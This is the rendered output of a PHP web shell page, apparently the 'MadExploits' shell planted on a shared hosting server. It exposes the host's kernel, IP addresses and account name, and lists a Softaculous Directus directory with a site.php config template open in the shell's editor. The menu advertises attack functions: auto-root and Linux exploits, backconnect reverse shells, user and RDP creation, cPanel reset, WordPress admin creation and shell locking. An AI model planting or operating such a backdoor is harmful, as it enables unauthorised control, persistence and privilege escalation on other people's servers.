Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 18.225.255.196
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
directus /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
.htaccess
90
B
-rw-r--r--
__api.json
51
B
-rw-r--r--
edit.php
5.24
KB
-rw-r--r--
edit.xml
447
B
-rw-r--r--
extend.php
9.97
KB
-rw-r--r--
fileindex.php
139
B
-rw-r--r--
import.php
3.96
KB
-rw-r--r--
info.xml
4.48
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
6.28
KB
-rw-r--r--
install.xml
629
B
-rw-r--r--
md5
11.24
KB
-rw-r--r--
notes.txt
1.2
KB
-rw-r--r--
site.php
2.57
KB
-rw-r--r--
update_pass.php
554
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : site.php
<?php return [ 'database' => [ 'type' => 'mysql', 'host' => '[[softdbhost]]', 'port' => 3306, 'name' => '[[softdb]]', 'username' => '[[softdbuser]]', 'password' => '[[softdbpass]]', 'engine' => 'InnoDB', 'charset' => 'utf8mb4', // Remove 'host' above when using sockets 'socket' => '', ], 'cookie' => [ 'same_site' => 'Lax', 'secure' => false ], 'cors' => [ 'enabled' => true, 'origin' => array ( 0 => '*', ), 'methods' => array ( 0 => 'GET', 1 => 'POST', 2 => 'PUT', 3 => 'PATCH', 4 => 'DELETE', 5 => 'HEAD', ), 'headers' => array ( ), 'exposed_headers' => array ( ), 'max_age' => 600, 'credentials' => true, ], 'rate_limit' => [ 'enabled' => false, 'limit' => 100, 'interval' => 60, 'adapter' => 'redis', 'host' => '127.0.0.1', 'port' => 6379, 'timeout' => 10, ], 'storage' => [ 'adapter' => 'local', 'root' => 'public/uploads/[[site_name]]/originals', 'root_url' => '/uploads/[[site_name]]/originals', 'thumb_root' => 'public/uploads/[[site_name]]/generated', // 'key' => '', // 'secret' => '', // 'region' => '', // 'version' => '', // 'bucket' => '', // 'options' => '', // 'endpoint' => '', // 'proxy_downloads' => '', ], 'mail' => [ 'default' => [ 'transport' => 'sendmail', // 'sendmail' => '', // 'host' => '', // 'port' => '', // 'username' => '', // 'password' => '', // 'encryption' => '', 'from' => 'admin@example.com' ], ], 'cache' => [ 'enabled' => false, 'response_ttl' => 3600, 'pool' => [ // 'adapter' => '', // 'path' => '', // 'host' => '', // 'port' => '', ], ], 'auth' => [ 'secret_key' => '[[secret_key]]', 'public_key' => '[[public_key]]', 'ttl' => 20, 'social_providers' => [ // 'okta' => '', // 'github' => '', // 'facebook' => '', // 'google' => '', // 'twitter' => '', ], ], 'hooks' => [ 'actions' => [], 'filters' => [], ], 'tableBlacklist' => [], 'env' => 'production', 'logger' => [ 'path' => '[[softpath]]/src/core/Directus/Util/Installation/../../../../../logs', ], ];
Close